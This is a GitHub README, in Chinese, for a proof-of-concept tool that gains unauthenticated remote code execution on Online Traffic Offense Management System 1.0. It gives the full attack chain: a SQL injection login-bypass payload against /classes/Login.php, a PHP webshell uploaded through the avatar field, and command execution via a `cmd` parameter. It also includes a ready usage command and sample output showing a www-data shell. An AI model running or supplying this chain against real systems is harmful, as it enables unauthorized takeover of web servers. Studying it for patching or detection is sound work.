estebanzarate/Online-Traffic-Offense-Management-System-1.0-Unauthenticated-RCE-PoC
GitHub: estebanzarate/Online-Traffic-Offense-Management-System-1.0-Unauthenticated-RCE-PoC
针对「在线交通违规管理系统」v1.0 的未授权远程代码执行漏洞的 PoC 利用工具,实现从 SQL 注入到获取交互式 Shell 的完整攻击链。
Stars: 1 | Forks: 0
# 在线交通违规管理系统 1.0 — 未授权 RCE (PoC)
## 工作原理
1. 通过针对 `/classes/Login.php` 的 SQLi (`'' OR 1=1-- '`) 绕过登录。
2. 抓取已认证用户的配置文件字段。
3. 通过头像字段 (`/classes/Users.php?f=save`) 上传 PHP webshell。
4. 解析配置文件页面以查找上传 shell 的 URL。
5. 通过 `cmd` GET 参数发送命令,打开交互式 shell。
## 环境要求
- Python 3
- 安装依赖:
```
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
```
## 使用方法
```
python3 exploit.py -u http://TARGET
```
**示例:**
```
$ python3 exploit.py -u http://10.10.10.10/management/
[*] Attempting SQLi login bypass...
[+] Login bypassed
[*] Fetching user info...
[*] Uploading webshell...
[+] Webshell uploaded
[*] Locating shell...
[+] Shell URL: http://10.10.10.10/management/uploads/1772076840_evil.php
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
```
## 参考文献
- [EDB-50221](https://www.exploit-db.com/exploits/50221)
- [Halit AKAYDIN 的原始 PoC](https://www.exploit-db.com/exploits/50221)
## 致谢
- **发现与原始漏洞利用:** Halit AKAYDIN (hLtAkydn)
- **Python 3 移植与交互式 shell:** [Esteban Zárate](https://github.com/estebanzarate)
标签:CISA项目, Online Traffic Offense Management System, OpenVAS, PHP, PoC, Python, RCE, Webshell, Web安全, 文件上传漏洞, 无后门, 暴力破解, 未授权访问, 权限绕过, 编程工具, 网络信息收集, 网络安全, 蓝队分析, 远程代码执行, 隐私保护